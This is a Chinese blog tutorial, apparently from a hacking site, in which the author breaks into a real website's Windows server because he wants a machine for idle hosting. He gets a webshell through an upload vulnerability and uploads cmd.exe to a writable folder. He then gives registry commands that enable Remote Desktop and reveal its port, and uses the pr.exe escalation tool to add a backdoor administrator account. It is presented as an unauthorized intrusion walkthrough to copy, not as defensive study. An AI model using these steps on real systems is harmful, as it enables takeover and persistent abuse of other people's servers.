记一次网站webshell提权服务器过程

今天闲来无事想弄台服务器玩玩。本想直接扫端口爆破一台,可是我想把服务器用来做挂机,稳定性和唯一性大家懂得。

偶尔用来挂些小玩意其实也挺不错的。记一次网站webshell提权服务器过程好了废话就不多说了,进入正题.

刚才我说过了。本人只要用服务器来挂机的 所以目标主机选择要是window系统。

一般判断网站服务器是什么系统有二种方法。如果大家还有其他方法的话可以在留言告诉我。我会归纳在文章中。

  1. 通过网站http://toolbar.netcraft.com/ 具体方法大家可以查看百度经验详细说明。
  2. 通过大小写判断网站服务器系统. window系统类服务器是不区分大小写的 然而linux系统则区分大小写

PS:比如本博客就是使用的linux主机 https://www.exehack.net/index.php 即可正常访问

https://www.exehack.net/Index.php 则无法访问.

记一次网站webshell提权服务器过程

测试目标:www.xxx.com

通过踩点发现改网站存在上传漏洞漏洞文件:admin/upfile_pic.asp

通过改漏洞直接在明小子里面使用上传功能获得了网站的webshell

记一次网站webshell提权服务器过程

记一次网站webshell提权服务器过程

拿到wenshell的过程比较鸡助~记一次网站webshell提权服务器过程 无所谓拉。~ 目的达到就行了。额哈哈。

1.通过脚本探针发现主机不支持 php  jsp  aspx

记一次网站webshell提权服务器过程

2.发现组件支持 wscript.shell √ 命令行执行组件,显示’×’时用 执行Cmd二 此功能执行

记一次网站webshell提权服务器过程

既然支持wscript.shell √ 命令行执行组件的话就尝试下执行cmd命令,可是支持的时候发现文件未找到

说明cmd的系统文件没有权限或者被管理员删除了,那么我们就找下有没有可读可写的目录上传自己的cmd.exe上去.

  • 指定文件夹根目录:C:recycler 可读,可写。
  • 文件夹:C:RECYCLERS-1-5-21-844828725-1289234386-3155959881-1006 不可读,不可写。
  • 文件夹:C:RECYCLERS-1-5-21-844828725-1289234386-3155959881-1008 不可读,不可写。
  • 文件夹:C:RECYCLERS-1-5-21-844828725-1289234386-3155959881-1013 不可读,不可写。
  • 文件夹:C:RECYCLERS-1-5-21-844828725-1289234386-3155959881-500 不可读,不可写。

发现C:recycler 可读,可写 那么我们就上传一个cmd上去 建议不要上传的时候把文件名修改为cmd.com 然后在执行

记一次网站webshell提权服务器过程

可以执行cmd后我们就先查看下目标网站的服务器是否是外网,经查询是外网服务器。

PS:如果是内网服务器就涉及到端口转发了 大家也可以参考我前面的文章lcx端口转发详细介绍及使用方法

如果查看下服务器是否开放3389终端,查询后没有发现有3389,可以看了下服务的确开放了3389终端服务。

那么大家如果也遇到这种情况那么肯定是管理员修改了默认的3389端口。

如果修改了3389端口或者没有开启3389的话可以通过执行一下命令。

开启3389
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

查看远程终端
REG query HKLMSYSTEMCurrentControlSetControlTerminal” “ServerWinStationsRDP-Tcp /v PortNumber

查看到的终端后是16进制 修改转换为10进度。

经过查询发现服务器的确将3389端口修改为5566, 如果尝试连接了下发现可以连接

记一次网站webshell提权服务器过程

既然可以连接的话那么现在只需要添加一个账户即可成功登录上服务器了。

一般情况在webshell下由于权限原因是不能够进行直接通过net user 命令来继续添加帐号密码的。

所以我们就需要利用到第三方工具进行提权,这里我就用pr.exe来进行提权把。也可以使用巴西烤肉。

刚才我们知道了C:recycler 可读,可写。 那么我还是上传一个pr.exe到改目录下然后进行提权

pr提权命令为: pr路径 “net user 用户名 密码 /add” 这里就是用C:recyclerpr.exe “net user exehack exehack.net /add”

然后在把exehack用户添加到管理组C:recyclerpr.exe “net localgroup administrators exehack /add”

记一次网站webshell提权服务器过程记一次网站webshell提权服务器过程

添加完成后使用帐号登录。

记一次网站webshell提权服务器过程记一次网站webshell提权服务器过程

教程就到这样了。

另外希望转载的朋友注明出处 OK ? 辛苦打字半天,被大家Ctrl+c 然后标注上自己的版权的心情 大家能理解么

avatar

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: